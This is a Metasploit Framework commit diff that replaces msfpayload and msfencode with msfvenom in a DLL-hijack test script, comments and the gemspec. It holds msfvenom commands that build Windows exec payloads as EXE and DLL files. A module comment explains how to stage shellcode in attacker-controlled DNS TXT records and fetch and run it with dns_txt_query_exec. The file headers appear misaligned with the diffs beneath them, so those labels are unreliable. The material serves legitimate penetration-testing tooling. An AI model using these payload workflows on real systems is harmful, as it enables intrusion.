Land rapid7#5509, remove msfencode and msfpayload

Fixes rapid7#4326

Thanks @wchen-r7!

Author: Tod Beardsley

external/source/DLLHijackAuditKit/regenerate_binaries.rb

@@ -2,12 +2,12 @@
 
 dllbase = File.expand_path(File.dirname(__FILE__))
 msfbase = File.expand_path(File.join(dllbase, "..", "..", ".."))
-msfp    = File.join(msfbase, "msfpayload")
+msfv    = File.join(msfbase, "msfvenom")
 
 Dir.chdir(dllbase)
 
-system("ruby #{msfp} windows/exec CMD=calc.exe X > runcalc.exe")
-system("ruby #{msfp} windows/exec CMD=calc.exe D > runcalc.dll")
-system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' D > runtest.dll")
-system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' X > runtest.exe")
+system("ruby #{msfv} -p windows/exec CMD=calc.exe -f exe -o runcalc.exe")
+system("ruby #{msfv} -p windows/exec CMD=calc.exe -f dll -o runcalc.dll")
+system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f dll -o runtest.dll")
+system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f exe -o runtest.exe")
 

external/zsh/_msfencode

@@ -1811,7 +1811,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
   # Generate an executable of a given format suitable for running on the
   # architecture/platform pair.
   #
-  # This routine is shared between msfencode, rpc, and payload modules (use
+  # This routine is shared between msfvenom, rpc, and payload modules (use
   # <payload>)
   #
   # @param framework [Framework]

lib/msf/util/exe.rb

@@ -36,7 +36,6 @@ Gem::Specification.new do |spec|
       'msfelfscan',
       'msfencode',
       'msfmachscan',
-      'msfpayload',
       'msfpescan',
       'msfrop',
       'msfrpc',

metasploit-framework.gemspec

@@ -40,18 +40,18 @@ def initialize(info = {})
   # 1. Generate the shellcode you want to deliver via DNS TXT queries
   #    Make sure the shellcode is alpha_mixed or alpha_upper and uses EDI as bufferregister
   #    Example :
-  #   ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw
-  #    Output : 654 bytes
+  #   ./msfvenom -p windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" -e x86/alpha_mixed Bufferregister=EDI -f raw
+  #    Output : 658 bytes
   # 2. Split the alpha shellcode into individual parts of exactly 255 bytes (+ remaining bytes)
-  #    In case of 654 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
+  #    In case of 658 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
   # 3. Create TXT records in a zone you control and put in a piece of the shellcode in each TXT record
   #    The last TXT record might have less than 255 bytes, that's fine
   #    The first part must be stored in the TXT record for prefix a.<yourdomain.com>
   #    The second part must be stored in the TXT record for b.<yourdomain.com>
   #    etc
   #    First part must start with a.  and all parts must be placed in consecutive records
   # 4. use the dns_txt_query payload in the exploit, specify the name of the DNS zone that contains the DNS TXT records
-  #    Example : /msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C
+  #    Example: ./msfvenom -p windows/dns_txt_query_exec DNSZONE=corelan.eu -f c
   #    (Example will show a messagebox)
   #
   # DNS TXT Records :